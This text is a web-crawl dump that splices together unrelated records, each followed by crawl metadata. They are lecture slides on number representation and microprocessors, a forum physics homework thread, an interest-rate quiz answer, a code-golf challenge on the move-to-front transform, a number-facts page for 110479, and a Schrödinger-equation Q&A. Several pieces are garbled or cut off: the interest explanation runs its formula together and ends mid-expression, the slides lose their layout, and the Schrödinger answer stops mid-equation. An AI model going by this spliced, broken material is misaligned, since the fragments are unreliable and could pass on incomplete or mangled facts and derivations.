:0, 1 ..\nThen, how characters such as A, a , or @ is represented ?\nBinary patterns are assigned to represent letters and characters\nASCII stands for American Standard Code for Information Interchange (1960)\nIt represent numerical numbers ( 0 9 ), alphabets ( LC , UC), symbols\nWell accepted by all manufacturers\n7 bit representation, 0 -> MSB : 8 bit code\nASCII Tables : see internet\nA: 41(H)\na: 61(H)\nCan you write a C program to convert to ACSII numbers ?\nFather of Floating Point\nOk, have you ever thought how floating points are\nstored in computers ?\nOr how about complex numbers ?\n10\nFractional representation\nFixed point representation; Limits\nFloating point representation: High Precisions : very large or very small numbers\nEx:\nOne well accepted standard: IEEE Floating point representation\nIEEE Single Precision\ncalled \"float\" in the C language family, and \"real\" or \"real*4\" in Fortran. This occupies 32\nbits (4 bytes) and has a significand precision of 24 bits (about 7 decimal digits).\nIEEE Double Precision\ncalled \"double\" in the C language family, and \"double precision\" or \"real*8\" in\nFortran. This occupies 64 bits (8 bytes) and has a significand precision of 53 bits\n(about 16 decimal digits).\n-35 24\n10 X 8.9769 10 X 5.675 or\nAssignment No. 2\n1) Write abt IEEE SP / DP\n2) Hand written only\n3) Elucidate (1) with 2 examples each\n4) How complex is represented in IEEE single precision or double precision\n5) Due Date: 12/5/2008\n11\nIEEE Precision standard - I\n3 components in IEEE Floating Point\nrepresentation:\na) Sign bit\n0 denotes a positive\nnumber;\n1 denotes a negative\nnumber..\nb) Exponents\nrepresent both positive and negative exponents.\nTo do this, a bias is added to the actual exponent in order to get the stored exponent.\nFor IEEE single-precision floats, this value is 127.\n- A stored value of 200 indicates an exponent of (200-127), or 73\nFor double precision, the exponent field is 11 bits, and has a bias of 1023.\nc) Mantissa\nThe mantissa, also known as the significand, represents the precision bits of the number\n12\nLittle Endian and Big Endian\nWe have seen how numbers are represented in UP. How are they stored ?\n\"Little Endian\"\nlow-order byte of the number is stored in memory at the lowest address, and the high-order byte at\nthe highest address. (The little end comes first.)\nFor example, a 4 byte LongInt :\nByte3 Byte2 Byte1 Byte0\nwill be arranged in memory as follows\n\"Big Endian\"\nmeans that the high-order byte of the number is stored in memory at the lowest address, and\nthe low-order byte at the highest address. (The big end comes first.)\nExample of big endian : Sun machine, Adobe potoshop, Motorola\nExample\n13\nMicroprocessor - General architecture\nand components\nComponents (resources ) in a UP\n1) Arithmetic Logic Unit\nPerform the arithmetic function such as add,\nsubtract, multiply and divide , AND, OR, NOT\n2) Register\nTemporary storage, it could contain any info.\n8 bit, 16 bit, 32 bit, 6bit\nDetermines bits of a UP, ex, 16 bit UP has 16 bit\ninternal register.\nBigger the register, better the CPU\n3) Program Counter\nFunction: point to the address of next instruction to\nbe executed Once each instruction is executed,\nthe PC is incremented to address of next\ninstruction. It the content of PC is placed on\naddress bus to find /fetch next instruction. In IBM\nPC, its known as Instruction Pointer\n4) Instruction Decoder\nInterpret the instruction fetched into\nthe MP\ndictionary? Store the meaning and\nwhat to do\nHow does a MP work\nA microprocessor needs a set of instructions to follow that tell it what\noperations to perform on what data\nThese instructions are stored sequentially in the memory of the system\nThe microprocessor fetches the first instruction from a designated area in\nits memory, decodes it and executes the specified operation\nThis sequence of fetch, decode and execute is continued indefinitely until\nthe microprocessor reaches an instruction to stop.( Bus cycle )\nDuring this process, the microprocessor uses the system bus to fetch the\nbinary instructions and data from memory\nIt uses registers for temporary storage of data and results\nIt performs the computing operations on the data in the ALU\nAnd it sends out the results in binary, by using the same bus lines, to the\noutput unit or back into memory\n14\nLittle deeper\nOne BUS CYCLE\nThe content of program counter initially\n0000 0000 is placed on the address bus.\nThe instruction in this first address is 'read\nout of memory' and placed on the data bus\nThe instruction is held in the instruction\nregister whilst it is decoded into a signal\nthat goes to the control circuitry. This then\ncarries out the instruction.\nLet us suppose the instruction was to load a\nnumber stored in memory into the\naccumulator.\nThe program counter increments to 0000\n0001 the contents of this address are\nplaced on the data bus and the control\ncircuitry loads this into the accumulator.\nExample\n15\nProgram counter can have value between 0000 (h) FFFF (h)\nPC value is loaded with 1400(h) , the starting address. MP is ready for execution\nMP puts the values 1400 on address bus [ Read signal in on ] . PC is incremented\nContent of 1400(H) is put B0(H) on data bus and send to MP\nInstruction decoder decodes BO(H) - instruction is to bring 21H from address in PC.\nAll other registers are locked except register A\nPC is set to 1402(H)\nAnd this continues" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8480267,"math_prob":0.8712854,"size":11040,"snap":"2019-43-2019-47","text_gpt3_token_len":2752,"char_repetition_ratio":0.12558898,"word_repetition_ratio":0.034188036,"special_character_ratio":0.2663949,"punctuation_ratio":0.10203118,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96522266,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-22T16:47:15Z\",\"WARC-Record-ID\":\"<urn:uuid:ba4689c7-29db-467a-9de1-b9ab668eb0b8>\",\"Content-Length\":\"346661\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:95390866-a263-490f-9de3-45763ad5eb37>\",\"WARC-Concurrent-To\":\"<urn:uuid:fa739be0-fb6e-4949-9d95-630e8dc5b82e>\",\"WARC-IP-Address\":\"151.101.250.152\",\"WARC-Target-URI\":\"https://fr.scribd.com/document/238191163/AR-Lecture2\",\"WARC-Payload-Digest\":\"sha1:D6DLHIHWUNAXCYTYFS2R6ID2CZJS4RT6\",\"WARC-Block-Digest\":\"sha1:YJN23BCAZCNFCF2LTJI7AMLI3LFPDSMT\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987822458.91_warc_CC-MAIN-20191022155241-20191022182741-00410.warc.gz\"}"}
https://www.physicsforums.com/threads/lagrangian-problem.317694/
[ "# Lagrangian Problem\n\nI'm not sure if this is in the right section, if it isn't can someone please move it :)\n\nLagrangian mechanics has me completely stumped. Just doesn't seem to make any sense to me. So lets see how this goes.\n\nA best of mass m is threaded onto a frictionless wire and allowed to move under the pull of a constant gravitational acceleration g. the wire is bent into a curve y=f(x) in the x-y plane, with gravity pointing in the -y direction.\n\n(a) Let s(t) be the arc length along the bead's trajectory. Show that ds2 = dx2 +dy2\n\nFrom calculus i remember this being integral(a->b) of (1 + f'(x))1/2 dx\n\na = x, b = x + dx\n\nhow do I solve this :S\n\n(b) treating s(t) as a generalized coordinate, argue that the Lagrangian is given by\n\nL = (1/2)ms'2 - mgf[x(s)]\n\nWell if s(t) is it's position then s' is it's velocity so KE = (1/2)ms'2 and f[x(s)] is just its height so mgf[x(s)] is the PE. L = KE - PE\n\n(c) Argue that there exists a constant of the motion E such that\n\nE = (1/2)s'2 + gf[x(s)]\n\nWhat is E physically.\n\nWell E is the energy per unit mass. This exists due to the Lagrangians independence of time?\n\n(d) With the help of a diagram explain under what conditions the motion is periodic.\n\nPE > KE?\n\n(e) Show that the period is given by\n\nT = 21/2.integral(s1->s2) ds/((E-gf[x(s)])1/2)\n\nwhere s1 and s2 satisfy E=gf[x(s1)] and E=gf[x(s2)]\n\nTo do this do I have to find the equation of motion with respect to s?\n\n(There is more, but i think ill stop here!)\n\nSorry for being so vague but this stuff really does my head in. Any help or pointers would be greatly appreciated.\n\nThanks\n\nThe arc length is given by $s(t)=\\int_a^b \\sqrt{1+f'(x)^2}dx$, notice the square. Therefore $ds=\\sqrt{1+f'(x)^2}dx$. Secondly y=f(x), dy/dx=f'(x). Can you take it from here?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9258402,"math_prob":0.99720633,"size":3046,"snap":"2020-10-2020-16","text_gpt3_token_len":892,"char_repetition_ratio":0.09467456,"word_repetition_ratio":0.9453925,"special_character_ratio":0.30072227,"punctuation_ratio":0.067349926,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99944264,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-28T09:07:25Z\",\"WARC-Record-ID\":\"<urn:uuid:9adfb420-377b-4a53-b7a7-25d92d00c900>\",\"Content-Length\":\"65799\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9a3d7750-1bb4-4d7b-aa26-36752b81f510>\",\"WARC-Concurrent-To\":\"<urn:uuid:c99fc8c2-20ce-4cab-8f57-3471eb7b0ddc>\",\"WARC-IP-Address\":\"23.111.143.85\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/lagrangian-problem.317694/\",\"WARC-Payload-Digest\":\"sha1:RBHTMJTZMQBNI5GGTYWB5XY7WVSQESMN\",\"WARC-Block-Digest\":\"sha1:5ROJKKF4ADBI27TSUXDAV6ZLZN4MK77E\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875147116.85_warc_CC-MAIN-20200228073640-20200228103640-00055.warc.gz\"}"}
https://forums.examsbook.com/topic/6098/the-difference-between-simple-interest-and-compound-interest-of-a-certain-sum-of-money-at-20-per-annum-for-2-years-is-rs-56-then-the-sum-is
[ "Answer : 3 Rs. 1400 Explanation : Answer: C) Rs. 1400 Explanation: We know thatThe Difference between Compound Interest and Simple Interest for n years at R rate of interest is given by C.In - S.In = PR100nHere n = 2 years, R = 20%, C.I - S.I = 5656 = P201002=" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9346714,"math_prob":0.98540336,"size":260,"snap":"2021-31-2021-39","text_gpt3_token_len":79,"char_repetition_ratio":0.125,"word_repetition_ratio":0.0,"special_character_ratio":0.37692308,"punctuation_ratio":0.20338982,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99433905,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T14:57:26Z\",\"WARC-Record-ID\":\"<urn:uuid:308649c4-637c-4b29-a527-56b48a06baaf>\",\"Content-Length\":\"27627\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0ee7846d-2c4b-4e7b-b5e7-a7b610bd4f43>\",\"WARC-Concurrent-To\":\"<urn:uuid:d59a9409-cf9b-44cc-9d4f-ea985d142ebf>\",\"WARC-IP-Address\":\"152.67.15.221\",\"WARC-Target-URI\":\"https://forums.examsbook.com/topic/6098/the-difference-between-simple-interest-and-compound-interest-of-a-certain-sum-of-money-at-20-per-annum-for-2-years-is-rs-56-then-the-sum-is\",\"WARC-Payload-Digest\":\"sha1:BVXCU4KXHEKNVP7TLYI2GA7ANVLDDKQX\",\"WARC-Block-Digest\":\"sha1:F4NQ6R3R3IFTQYDLQ5OIYSI2U7PTCRZP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057558.23_warc_CC-MAIN-20210924140738-20210924170738-00229.warc.gz\"}"}
https://codegolf.stackexchange.com/questions/52592/move-to-the-printable-ascii-front
[ "# Move to the printable ASCII front\n\n### Background\n\nThe move-to-front transform (MTF) is a data encoding algorithm designed to improve the performance of entropy encoding techniques.\n\nIn the bzip2 compression algorithm, it is applied after the Burrows–Wheeler transform (as seen in Burrows, Wheeler and Back), with the objective of turning groups of repeated characters into small, easily compressible non-negative integers.\n\n### Definition\n\nFor the purpose of this challenge, we'll define the printable ASCII version of the MTF as follows:\n\nGiven an input string s, take an empty array r, the string d of all printable ASCII characters (0x20 to 0x7E) and repeat the following for each character c of s:\n\n1. Append the index of c in d to r.\n\n2. Move c to the front of d, i.e., remove c from d and prepend it to the remainder.\n\nFinally, we take the elements of r as indexes in the original d and fetch the corresponding characters.\n\n### Step-by-step example\n\nINPUT: \"CODEGOLF\"\n\n0. s = \"CODEGOLF\"\nd = \" !\\\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\" r = [] 1. s = \"ODEGOLF\" d = \"C !\\\"#$%&'()*+,-./0123456789:;<=>?@ABDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\"\nr = \n2. s = \"DEGOLF\"\nd = \"OC !\\\"#$%&'()*+,-./0123456789:;<=>?@ABDEFGHIJKLMNPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\" r = [35 47] 3. s = \"EGOLF\" d = \"DOC !\\\"#$%&'()*+,-./0123456789:;<=>?@ABEFGHIJKLMNPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\"\nr = [35 47 37]\n4. s = \"GOLF\"\nd = \"EDOC !\\\"#$%&'()*+,-./0123456789:;<=>?@ABFGHIJKLMNPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\" r = [35 47 37 38] 5. s = \"OLF\" d = \"GEDOC !\\\"#$%&'()*+,-./0123456789:;<=>?@ABFHIJKLMNPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\"\nr = [35 47 37 38 40]\n6. s = \"LF\"\nd = \"OGEDC !\\\"#$%&'()*+,-./0123456789:;<=>?@ABFHIJKLMNPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\" r = [35 47 37 38 40 3] 7. s = \"F\" d = \"LOGEDC !\\\"#$%&'()*+,-./0123456789:;<=>?@ABFHIJKMNPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\"\nr = [35 47 37 38 40 3 45]\n8. s = \"\"\nd = \"FLOGEDC !\\\"#$%&'()*+,-./0123456789:;<=>?@ABHIJKMNPQRSTUVWXYZ[\\]^_abcdefghijklmnopqrstuvwxyz{|}~\" r = [35 47 37 38 40 3 45 41] OUTPUT: \"COEFH#MI\" ### Task Write a program or function that implements the printable ASCII MTF (as defined above). ### Test cases Input: Programming Puzzles & Code Golf Output: Prpi\"do lp%((uz rnu&3!P/o&$U$(p Input: NaNNaNNaNNaNNaNNaNNaNNaNNaNNaNNaNNaNNaNNaNNaNNaN BATMAN! Output: Na! !! !! !! !! !! !! !! !! !! !! !! !! !! !! !!\"DDUP\"%' Input: Two more questions and I have bzip2 in less than 100 bytes! Output: Twp#o\"si$sv#uvq(u$(l#o#W!r%w+$pz,xF%#,\"x(. #0--'$GG \".z(**: ### Additional rules • You cannot use any built-in operator that computes the MTF of a string. • Your code may print a trailing newline if you choose STDOUT for output. • Your code has to work for any input of 1000 or less printable ASCII characters (0x20 to 0x7E). • Standard code golf rules apply. The shortest submission in bytes wins. • \"Nanananana DDUP!\" just isn't as catchy as \"Batman!\"... – Doorknob Jul 3 '15 at 22:12 • @Doorknob: But Batman isn't easily compressible. – Dennis Jul 3 '15 at 22:13 • Can we output the result in a function return instead of printing it to STDOUT? – Fatalize Jul 3 '15 at 22:39 • @Fatalize: That's the most natural form of output for functions, so yes. By the way, we have defaults for I/O, so unless the question explicitly says otherwise, that's always allowed. – Dennis Jul 3 '15 at 22:43 ## 7 Answers # CJam, 20 '¡,q{_C#c' ,C+@|}fC; Try it online Explanation: '¡, make a string of characters with codes from 0 to 160 (a modified \"d\") could have been to 126 but stackexchange doesn't like the DEL character q read the input (s) {…}fC for each character C in s _ duplicate the d string C# find the index of C in d c convert to character (this is the result) ' , make a string of characters from 0 to 31 C+ append C to the string @ bring d to the top | set union, preserving order; effectively, C is moved to position 32 this is the updated d string ; pop the last d # Ostrich, 46 45 chars Don't have a version number in the header because this is actually just the latest commit. I added the O (ascii code to string) operator after releasing the latest version (but still before this challenge was posted). {a95,{32+O}%:d3@{:x\\.3@?3@\\+\\x-x\\+}/;{d=}%s*} Explanation: a this is the \"r\" array (a is short for [], empty array) 95,{32+O}%:d this is the \"d\" array 3@{...}/ for each character in the input (as an \"argument\")... :x store in variable x (stack is now [r d c]) \\.3@? find index in d (stack is now [r d idx]) 3@\\+ append index to r (stack is now [d modified_r]) \\x- remove char from d, and then... x\\+ prepend char to d (stack is now [modified_r modified_d]) ; throw away modified_d {d=}% map r to indices of (original) d s* join (s is short for , empty string) • I'm wondering if PPCG is turning from \"code this task in the most conscise way possible in your favourite language\" to \"design your own programming language to solve the typical code golf task shorter than golfscript\" – John Dvorak Jul 5 '15 at 12:30 • @AlexA. ... wait, huh, it's spelled that way? my entire life has been a lie – Doorknob Jul 6 '15 at 0:41 • @JanDvorak Ostrich is almost identical to GolfScript. Only real reason I created it is because a.) GolfScript annoyingly does not have a REPL and b.) there are a few missing operators/features (floating point, I/O, etc). And language design is fun anyway! – Doorknob Jul 6 '15 at 0:43 # Python 3, 88 *d,=range(127) for c in input():y=d.index(ord(c));d[:32]+=d.pop(y),;print(chr(y),end='') Using some ideas from my CJam solution. -4 bytes belong to Sp3000 :) # SWI-Prolog, 239197 189 bytes a(S):-l(,X),a(S,X,[],R),b(R,X). a([A|T],X,S,R):-nth0(I,X,A,Z),(a(T,[A|Z],[I|S],R);R=[I|S]). b([A|T],X):-(b(T,X);!),nth0(A,X,E),put(E). l([B|R],Z):-A is B-1,X=[A,B|R],(A=32,Z=X;l(X,Z)). Example: a(Two more questions and I have bzip2 in less than 100 bytes!). outputs: Twp#o\"si$sv#uvq(u$(l#o#W!r%w+$pz,xF%#,\"x(. #0--'\\$GG \".z(**:\n\n\n(and true . after it, obviously)\n\nNote: your SWI-Prolog version has to be one of the newer ones in which the backquote represents codes strings. Code strings used to be represented with double-quotes \" in older versions.\n\n# Python 2, 137110 104\n\nWasn't hard to implement, but maybe still golfable?\n\nTry it here\n\ne=d=map(chr,range(32,127))\nr=\"\"\nfor c in raw_input():n=e.index(c);r+=d[n];e=[e[n]]+e[:n]+e[n+1:]\nprint r\n\n• I think you're better off doing a list map e=d=map(chr,range(32,127)) in Python 2, though you have to tweak the e to handle a list. – xnor Jul 4 '15 at 9:37\n• @xnor Thanks. I also tried using e=[e.pop(n)]+e, but it doesn't work. Why is that? – mbomb007 Jul 6 '15 at 17:25\n• You've got e=d=, so when you pop from e you're also popping from d. Try d=e[:]. – Sp3000 Jul 6 '15 at 17:47\n• But at this point it's probably better to just do n=e.index(ord(c));r+=chr(n+32); and drop d – Sp3000 Jul 6 '15 at 17:51\n\n# Pyth, 24 bytes\n\nJK>95CM127s@LKxL~J+d-Jdz\n\n\nThe first bit. JK>95CM127 sets up the necessary list and saves it to J and K. ~J+d-Jd performs the list updating, while xL ... z maps the input characters to their positions in the list. Finally, s@LK converts those indexes to characters in the original list.\n\ne#s=[b|(b,a)<-zip[0..]s,a==e]!!0\n\nUsage example: f \"CODEGOLF\" -> \"COEFH#MI\"\nHow it works: # is an index function that returns the position of e in s (can't use Haskell's native elemIndex because of an expensive import). The main function f follows a fold pattern where it updates the position string d and result string r as it walks through the input string." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6694549,"math_prob":0.92331743,"size":2917,"snap":"2020-34-2020-40","text_gpt3_token_len":979,"char_repetition_ratio":0.13731548,"word_repetition_ratio":0.07052897,"special_character_ratio":0.38121358,"punctuation_ratio":0.24285714,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97251564,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-15T03:07:01Z\",\"WARC-Record-ID\":\"<urn:uuid:0b98567a-4d53-4821-9ec6-711d205b830c>\",\"Content-Length\":\"216830\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:06691e85-3bd0-43d5-9f4e-186e8b755467>\",\"WARC-Concurrent-To\":\"<urn:uuid:158b36a3-d1bf-40ad-9aa0-7c45bf52b2e2>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://codegolf.stackexchange.com/questions/52592/move-to-the-printable-ascii-front\",\"WARC-Payload-Digest\":\"sha1:MKOIJ3STNVXMNZ6AVA6ZZ7V2HRFCXJTL\",\"WARC-Block-Digest\":\"sha1:N2YDLT7QF3RVXHNKRBW5RZT7HBXZIHYR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439740423.36_warc_CC-MAIN-20200815005453-20200815035453-00277.warc.gz\"}"}
https://metanumbers.com/110479
[ "## 110479\n\n110,479 (one hundred ten thousand four hundred seventy-nine) is an odd six-digits prime number following 110478 and preceding 110480. In scientific notation, it is written as 1.10479 × 105. The sum of its digits is 22. It has a total of 1 prime factor and 2 positive divisors. There are 110,478 positive integers (up to 110479) that are relatively prime to 110479.\n\n## Basic properties\n\n• Is Prime? Yes\n• Number parity Odd\n• Number length 6\n• Sum of Digits 22\n• Digital Root 4\n\n## Name\n\nShort name 110 thousand 479 one hundred ten thousand four hundred seventy-nine\n\n## Notation\n\nScientific notation 1.10479 × 105 110.479 × 103\n\n## Prime Factorization of 110479\n\nPrime Factorization 110479\n\nPrime number\nDistinct Factors Total Factors Radical ω(n) 1 Total number of distinct prime factors Ω(n) 1 Total number of prime factors rad(n) 110479 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) -1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 11.6126 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 110,479 is 110479. Since it has a total of 1 prime factor, 110,479 is a prime number.\n\n## Divisors of 110479\n\n2 divisors\n\n Even divisors 0 2 1 1\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 2 Total number of the positive divisors of n σ(n) 110480 Sum of all the positive divisors of n s(n) 1 Sum of the proper positive divisors of n A(n) 55240 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 332.384 Returns the nth root of the product of n divisors H(n) 1.99998 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 110,479 can be divided by 2 positive divisors (out of which 0 are even, and 2 are odd). The sum of these divisors (counting 110,479) is 110,480, the average is 55,240.\n\n## Other Arithmetic Functions (n = 110479)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 110478 Total number of positive integers not greater than n that are coprime to n λ(n) 110478 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 10466 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 110,478 positive integers (less than 110,479) that are coprime with 110,479. And there are approximately 10,466 prime numbers less than or equal to 110,479.\n\n## Divisibility of 110479\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 3 4 1 5 7 4\n\n110,479 is not divisible by any number less than or equal to 9.\n\n## Classification of 110479\n\n• Arithmetic\n• Prime\n• Deficient\n\n### Expressible via specific sums\n\n• Polite\n• Non-hypotenuse\n\n• Prime Power\n• Square Free\n\n## Base conversion (110479)\n\nBase System Value\n2 Binary 11010111110001111\n3 Ternary 12121112211\n4 Quaternary 122332033\n5 Quinary 12013404\n6 Senary 2211251\n8 Octal 327617\n10 Decimal 110479\n12 Duodecimal 53b27\n20 Vigesimal dg3j\n36 Base36 2d8v\n\n## Basic calculations (n = 110479)\n\n### Multiplication\n\nn×i\n n×2 220958 331437 441916 552395\n\n### Division\n\nni\n n⁄2 55239.5 36826.3 27619.8 22095.8\n\n### Exponentiation\n\nni\n n2 12205609441 1348463525432239 148976901826228332481 16458819136859879944168399\n\n### Nth Root\n\ni√n\n 2√n 332.384 47.9836 18.2314 10.2013\n\n## 110479 as geometric shapes\n\n### Circle\n\n Diameter 220958 694160 3.83451e+10\n\n### Sphere\n\n Volume 5.64843e+15 1.5338e+11 694160\n\n### Square\n\nLength = n\n Perimeter 441916 1.22056e+10 156241\n\n### Cube\n\nLength = n\n Surface area 7.32337e+10 1.34846e+15 191355\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 331437 5.28518e+09 95677.6\n\n### Triangular Pyramid\n\nLength = n\n Surface area 2.11407e+10 1.58918e+14 90205.7" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6090343,"math_prob":0.98089457,"size":4622,"snap":"2021-31-2021-39","text_gpt3_token_len":1622,"char_repetition_ratio":0.12429623,"word_repetition_ratio":0.03240059,"special_character_ratio":0.4582432,"punctuation_ratio":0.07653061,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99886966,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-26T20:41:28Z\",\"WARC-Record-ID\":\"<urn:uuid:eac6b6c9-e500-4617-9fc6-54b50c5970a0>\",\"Content-Length\":\"59737\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:695067ec-53b5-44f3-8cb8-847216ccb291>\",\"WARC-Concurrent-To\":\"<urn:uuid:abe76f9a-a80d-4e51-8924-024ea02f6625>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/110479\",\"WARC-Payload-Digest\":\"sha1:HLCXNHUQHG5DCLCPF7KFZS6BRFCUAAVQ\",\"WARC-Block-Digest\":\"sha1:CICBGI5EQ3RRD67IKDCTYDV5RPPKD6ZU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152144.92_warc_CC-MAIN-20210726183622-20210726213622-00317.warc.gz\"}"}
https://physics.stackexchange.com/questions/142169/how-can-one-derive-schr%C3%B6dinger-equation/158743
[ "# How can one derive Schrödinger equation?\n\nThe Schrödinger equation is the basis to understanding quantum mechanics, but how can one derive it? I asked my instructor but he told me that it came from the experience of Schrödinger and his experiments. My question is, can one derive the Schrödinger equation mathematically?\n\n• Possible duplicate: physics.stackexchange.com/questions/135872/… – Bubble Oct 19 '14 at 23:15\n• @Bubble related, but not a duplicate IMO since that question is asking for a physical motivation, not a derivation. – David Z Oct 20 '14 at 5:00\n• – user 170039 Oct 20 '14 at 16:34\n\n## 7 Answers\n\nBe aware that a \"mathematical derivation\" of a physical principle is, in general, not possible. Mathematics does not concern the real world, we always need empirical input to decide which mathematical frameworks correspond to the real world.\n\nHowever, the Schrödinger equation can be seen arising naturally from classical mechanics through the process of quantization. More precisely, we can motivate quantum mechanics from classical mechanics purely through Lie theory, as is discussed here, yielding the quantization prescription\n\n$$\\{\\dot{},\\dot{}\\} \\mapsto \\frac{1}{\\mathrm{i}\\hbar}[\\dot{},\\dot{}]$$\n\nfor the classical Poisson bracket. Now, the classical evolution of observables on the phase space is\n\n$$\\frac{\\mathrm{d}}{\\mathrm{d}t} f = \\{f,H\\} + \\partial_t f$$\n\nand so its quantization is the operator equation\n\n$$\\frac{\\mathrm{d}}{\\mathrm{d}t} f = \\frac{\\mathrm{i}}{\\hbar}[H,f] + \\partial_t f$$\n\nwhich is the equation of motion in the Heisenberg picture. Since the Heisenberg and Schrödinger picture are unitarily equivalent, this is a \"derivation\" of the Schrödinger equation from classical phase space mechanics.\n\n• What about the \"derivation\" via path integrals? – Your Majesty Oct 19 '14 at 22:57\n• @LoveLearning: It all depends on where you want to start. In my view, the most mysterious element of both the Schrödinger equation and the path integral is the appearance of $\\mathrm{i}$. You can indeed derive the SE from the path integral (and vice versa), but then you have to explain why the heck you are integrating over $e^{iS/\\hbar}$ in the first place. The procedure of geometric quantization at least gives a mathematical motivation for that, starting from classical mechanics. Of course, if you believe that we should not start from classical mechanics, then you'll not find this convincing. – ACuriousMind Oct 19 '14 at 23:08\n• Derive Schrödinger equation via path integrals can be at most a \"physical\" derivation, but never a mathematical deivation, since path integrals in the sense of Feynman do not have a mathematical meaning. – Mateus Sampaio Oct 20 '14 at 0:40\n• @LoveLearning See my newly added answer for more clarifications. – Phonon Oct 20 '14 at 10:32\n• @ACuriousMind +1: I think I'm going to make a T-shirt that reads \"It all depends on where you want to start\" and start selling it. That way, you can just point to your chest next time. I will also benefit immensely from wearing it when I walk around campus. Can I mark you down for one order? – joshphysics Oct 31 '14 at 4:58\n\nSmall addition to ACuriousMind's great answer, in reply to some of the comments asking for a derivation of Schrödinger wave equation, using the results of Feynman's path integral formalism:\n\n(Note: not all steps can be included here, it would be too long to remain in the context of a forum-discussion-answer.)\n\nIn the path integral formalism, each path is attributed a wavefunction $\\Phi[x(t)]$, that contributes to the total amplitude, of let's say, to go from $a$ to $b.$ The $\\Phi$'s have the same magnitude but have differing phases, which is just given by the classical action $S$ as was defined in the Lagrangian formalism of classical mechanics. So far we have: $$S[x(t)]= \\int_{t_a}^{t_b} L(\\dot{x},x,t) dt$$ and $$\\Phi[x(t)]=e^{(i/\\hbar) S[x(t)]}$$\n\nDenoting the total amplitude $K(a,b)$, given by: $$K(a,b) = \\sum_{paths-a-to-b}\\Phi[x(t)]$$\n\nThe idea to approach the wave equation, describing the wavefunctions as a function of time, we should start by dividing the time interval between $a$-$b$ into $N$ small intervals of length $\\epsilon$, and for a better notation, let's use $x_k$ for a given path between $a$-$b$, and denote the full amplitude, including its time dependance as $\\psi(x_k,t)$ ($x_k$ taken over a region $R$):\n\n$$\\psi(x_k,t)=\\lim_{\\epsilon \\to 0} \\int_{R} \\exp\\left[\\frac{i}{\\hbar}\\sum_{i=-\\infty}^{+\\infty}S(x_{i+1},x_i)\\right]\\frac{dx_{k-1}}{A} \\frac{dx_{k-2}}{A}... 